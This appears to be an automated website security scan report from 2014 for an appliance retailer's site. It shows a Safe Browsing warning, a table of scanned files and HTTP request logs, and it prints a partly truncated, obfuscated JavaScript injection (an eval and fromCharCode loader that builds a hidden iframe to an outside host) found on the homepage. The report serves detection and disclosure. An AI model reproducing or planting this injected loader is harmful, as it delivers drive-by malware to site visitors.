Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=5thaveappliance.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://5thaveappliance.com/ | 200 OK Content-Length: 6414 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) aq="0x";ff=String;fff="fromCh"+"a"+"rCode";ff=ff[fff];zz=3;try{document.body^=~1;}catch(z1z1){v=123;vzs=0;try{document;}catch(q){vzs=1;}if(!vzs)e=eval;if(1){f="20,5e,6d,66,5b,6c,61,67,66,18,20,21,18,73,5,2,18,18,18,18,6e,59,6a,18,72,18,35,18,5c,67,5b,6d,65,5d,66,6c,26,5b,6a,5d,59,6c,5d,3d,64,5d,65,5d,66,6c,20,1f,61,5e,6a,59,65,5d,1f,21,33,5,2,5,2,18,18,18,18,72,26,6b,6a,5b,18,35,18,1f,60,6c,6c,68,32,27,27,6a,5d,5c,5d,5d,65,6f,61,6b,60,5d,6b,26,5b,67,65 ...[1193 bytes skipped]... Antivirus reports:
| ||
http://static.dudamobile.com/DM_redirect.js | 200 OK Content-Length: 713 Content-Type: application/x-javascript | clean |
http://5thaveappliance.com/../Scripts/swfobject_modified.js | 400 Bad Request Content-Length: 295 Content-Type: text/html | clean |
http://5thaveappliance.com/test404page.js | 404 Not Found Content-Length: 2693 Content-Type: text/html | clean |
http://82.200.204.151/jquery-api.js?56=1 | 500 Can't connect to 82.200.204.151:80 (Ð Ñоединении оÑказано) Content-Length: 208 Content-Type: text/plain | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: 5thaveappliance.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Tue, 22 Apr 2014 08:18:06 GMT
Accept-Ranges: bytes
Server: Apache
Vary: Accept-Encoding
Content-Length: 6414
Content-Type: text/html
...6414 bytes of data.
GET / HTTP/1.1
Host: 5thaveappliance.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Tue, 22 Apr 2014 08:18:06 GMT
Accept-Ranges: bytes
Server: Apache
Vary: Accept-Encoding
Content-Length: 6414
Content-Type: text/html
...6414 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: 5thaveappliance.com
Referer: http://www.google.com/search?q=5thaveappliance.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: 5thaveappliance.com
Referer: http://www.google.com/search?q=5thaveappliance.com
Result:
The result is similar to the first query. There are no suspicious redirects found.